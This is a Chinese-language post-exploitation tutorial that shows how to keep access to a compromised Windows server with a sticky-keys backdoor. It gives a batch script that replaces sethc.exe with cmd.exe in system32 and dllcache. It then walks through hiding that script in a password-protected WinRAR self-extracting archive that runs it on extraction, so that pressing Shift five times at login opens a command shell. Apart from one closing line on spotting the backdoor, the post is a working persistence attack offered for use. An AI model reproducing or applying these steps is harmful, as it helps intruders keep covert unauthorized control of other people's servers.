后渗透篇:纯手工打造服务器自解压shift后门【详细演示】

  • 时间:
  • 来源:互联网
  • 文章标签:

当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

纯手工打造服务器自解压shift后门

0x01 介绍

0x02 实例演示


 

纯手工打造服务器自解压shift后门

0x01 介绍

      很多时候我们拿到一台服务器之后都会留下一个后门程序,方便下次进入。还有,服务器比较主流的就是shift后门,也就是替换服务器自带的粘滞键,为我们的后门文件。

      调用shift后门方法:连续按五下Shift键即可调出

 

0x02 实例演示

1. 创建test.bat 批处理文件,在文件里写入如下内容

以下两段代码的意思是将shift.exe重命名为sethc.exe,且替换系统盘符复制到系统盘符下的cmd.exe,即调用出cmd窗口。

  1. cd %systemroot%\system32
  2. copy shift.exe %systemroot%\system32\sethc.exe /y
  3. copy cmd.exe %systemroot%\system32\sethc.exe /y
  4. copy cmd.exe %systemroot%\system32\dllcache\sethc.exe /y

我这里使用的是WinRAR 压缩软件

3. 将test.bat添加到压缩文件

右键test.bat——>发送到——>压缩(zipped)文件夹——>(创建自解压格式压缩文件打上勾)–然后点击高级–点击设置密码–然后点击确定–点击自解压选项——>【常规】选项下设置解压路径——> 【设置】选项下设置提取后运行的命令后

具体设置步骤图解,请看下面图解操作

选择test.bat 右击选择【添加到压缩文件】

压缩文件名和参数的【常规】界面的压缩选项,勾选【创建自解压格式压缩文件】

压缩文件名和参数的【常规】界面下【设置解压密码】

压缩文件名和参数的【高级】界面的自解压选项,弹出【高级自解压选项】,在【高级自解压选项】的【常规】界面下设置你要保存的路径

【高级自解压选项】的【设置】界面下设置你解压提权文件后要运行的命令

以上步骤完成后,会在桌面生成一个自解压的文件

双击一下打开

输入刚刚设置的解压提取密码

选择【全部选是】

最后,我们为了更好的演示。现在注销当前账号,然后连按Shift键5次,会自动弹出DOS窗口。

 

注意:如果你发现按五下shift调出来的不是如下图所示的的粘滞键,那么你的服务器肯定是被别人入侵了。

参考链接:

               https://www.myhack58.com/Article/60/63/2014/56431.htm

 


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

本文链接http://www.taodudu.cc/news/show-647585.html